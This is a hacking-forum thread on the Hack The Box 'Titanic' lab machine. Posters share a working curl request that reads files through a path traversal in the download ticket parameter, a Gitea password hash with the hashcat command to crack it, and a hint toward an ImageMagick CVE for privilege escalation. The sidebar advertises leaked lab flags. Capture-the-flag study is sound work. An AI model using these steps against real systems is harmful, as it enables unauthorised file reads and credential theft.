Feb 16, 2025, 01:06 AM
how did you know the location of gitea.db?
|
Titanic Hack the Box Season 7 (Linux Easy)
by RedBlock - Saturday February 15, 2025 at 02:59 PM
|
|
Feb 16, 2025, 01:06 AM
how did you know the location of gitea.db?
Feb 16, 2025, 01:24 AM
Feb 16, 2025, 03:24 AM
I am still confused as to how we did the root thing
Feb 16, 2025, 03:46 AM
(Feb 16, 2025, 01:24 AM)samuelballsiu1 Wrote:(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db? sorry silly mistakes try to bruteforce dirsearch where the dev subdomain is certainly open next question.. how to find any clue for priv esc? i'm running linpeas but not found interesting.
Feb 16, 2025, 03:46 AM
(Feb 15, 2025, 07:17 PM)LostGem Wrote: user flag curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: titanic.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://titanic.htb/' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \ $'http://titanic.htb/download?ticket=/home/developer/user.txt' Copied from burp. Directly point ticket=/home/developer/user.txt works.
Feb 16, 2025, 05:10 AM
Feb 16, 2025, 12:14 PM
(Feb 15, 2025, 07:58 PM)LostGem Wrote: userflagHow did you find this vulnerability?
Feb 16, 2025, 12:50 PM
Quote:How did you find this vulnerability? After finding that script, check magick version and google for vulns, read CVE description and you are ready to go
Feb 16, 2025, 01:17 PM
So the script in /opt/scripts and the custom PATH for the developer user were only rabbit holes ?
Feb 16, 2025, 03:57 PM
(This post was last modified: Feb 16, 2025, 04:39 PM by Gattsu_berk_1421.)
For me, hashcat doesnt like the format the hashes are in after gitea2hashcat.py script. What is the correct format for the hashes?
For anyone thats having similar issues: cat developer_hash.txt sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= hashcat -m 10900 --force developer_hash.txt /usr/share/wordlists/rockyou.txt |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 85 | 3,001 |
23 minutes ago Last Post: suncho |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 29 | 2,678 |
4 hours ago Last Post: newuser201 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 41 | 3,335 |
4 hours ago Last Post: newuser201 |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 95 | 8,733 |
9 hours ago Last Post: zxACASD |
||
| CBBH Write Ups | 26 | 6,687 |
Yesterday, 08:45 AM Last Post: d39ug |
||